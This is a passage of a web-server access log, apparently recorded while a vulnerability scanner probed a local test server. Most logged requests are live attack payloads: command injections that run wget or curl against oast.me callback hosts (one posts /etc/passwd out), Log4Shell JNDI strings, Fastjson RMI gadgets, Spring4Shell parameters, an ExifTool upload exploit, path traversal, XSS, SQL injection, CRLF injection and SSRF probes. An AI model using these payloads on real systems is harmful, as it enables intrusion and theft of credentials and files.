+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://ca27l3osmpvb3nig07h01d8igraqexku5.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://ca27l3osmpvb3nig07h0z3i6qzgayg5ru.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://ca27l3osmpvb3nig07h0xsucxj5zr1pdu.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20ca27l3osmpvb3nig07h0xes1wh6j8hkfq.oast.me) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=QMkr@ikDD&url=http://ca27l3osmpvb3nig07h0jsfkoej6tygka.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://ca27l3osmpvb3nig07h0t9fei4apehokj.oast.me%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"\x0D\x0A\x0D\x0A&e1;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca27l3osmpvb3nig07h081ny9n9b9zqgq.oast.me #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"{\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca27l3osmpvb3nig07h0twtmeuqzzkish.oast.me/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/ReportTemplateService.xls HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://ca27l3osmpvb3nig07h0zh3fuwd57drke.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"url=https://127.0.0.1:443@ca27l3osmpvb3nig07h0xukfc91ao39jm.oast.me\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"command=2&ipAddr=&dnsAddr=$(wget+http://ca27l3osmpvb3nig07h0f3zhe7wzhki48.oast.me)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/networkDiag.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"sondata[ip]=a|curl ca27l3osmpvb3nig07h0g4b3oqu8615ub.oast.me&jsondata[type]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/ping.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://ca27l3osmpvb3nig07h0s5hhip498i4nx.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://ca27l3osmpvb3nig07h0c8wfew8gq5hyh.oast.me&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Images/Remote?imageUrl=http://ca27l3osmpvb3nig07h0k66daidmfpium.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://ca27l3osmpvb3nig07h0z9jj349z1abfx.oast.me)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.ca27l3osmpvb3nig07h0cs9oztu17c9i4.oast.me/test}&url=https://localhost HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fca27l3osmpvb3nig07h0wpqqs1p4kktdz.oast.me%3B%60%3B%23&password=asd&lang_select=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://ca27l3osmpvb3nig07h048uxk8wg48nyx.oast.me HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.jpg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0AAT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\x22?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\x0AFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0A\x09(Copyright \x22\x5C\x0A\x22 . qx{curl `whoami`.ca27l3osmpvb3nig07h09bju856ftbgeq.oast.me} . \x5C\x0A\x22 b \x22) ) \x0A\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5--\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /uploads/user HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://ca27l3osmpvb3nig07h0aaxuog1xe1k6k.oast.me/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sidekiq/queues/%22onmouseover=%22alert%28nuclei%29%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca27l3osmpvb3nig07h03xjhdd8imcnzp.oast.me/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca27l3osmpvb3nig07h08sdau4ggsmu4r.oast.me #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dfsms/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://ca27l3osmpvb3nig07h0ixrkbehtixymf.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"step=1&Language=de{${system(\x22ls\x22)}}&NextBtn=Weiter+%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mailingupgrade.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", 